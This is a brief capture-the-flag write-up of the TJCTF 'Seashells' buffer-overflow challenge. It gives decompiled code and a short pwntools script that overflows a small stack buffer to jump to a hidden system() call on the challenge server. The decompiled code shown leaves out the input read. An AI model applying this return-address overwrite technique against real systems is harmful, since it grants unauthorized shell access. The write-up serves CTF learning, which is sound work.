Tags: pwn 


# TJCTF: binary

Written by KyleForkBomb

_I heard there's someone selling shells? They seem to be out of stock though..._

`nc p1.tjctf.org 8009`

## Beginnings

Starting the program will look like this:
$ ./seashells
Welcome to Sally's Seashore Shell Shop
Would you like a shell?
yes!!!!! <-- user input
why are you even here?

And the associated (stripped) decompiled code:
int main() {
char s1[0xA];
puts("Welcome to Sally's Seashore Shell Shop");
puts("Would you like a shell?");
if ( !strcasecmp(s1, "yes") )
puts("sorry, we are out of stock");
puts("why are you even here?");
return 0;

This challenge is a classic buffer-overflow challenge. We take a look at `checksec` and gather our options:


PIE's off, and we can notice this small `shell()` function embedded in the binary:



Although there are if-checks, we'll just jump over them and head straight for the `system()` call (address shown above):


That'll be the challenge.

## flag


## code
from pwn import *
binsh = 0x4006E3
to_r = 0xA+8
r = remote('p1.tjctf.org', 8009)
r.sendlineafter('?\n', to_r*'A' + p64(binsh))

Original writeup (https://github.com/IRS-Cybersec/ctfdump/tree/master/tjctf/Seashells).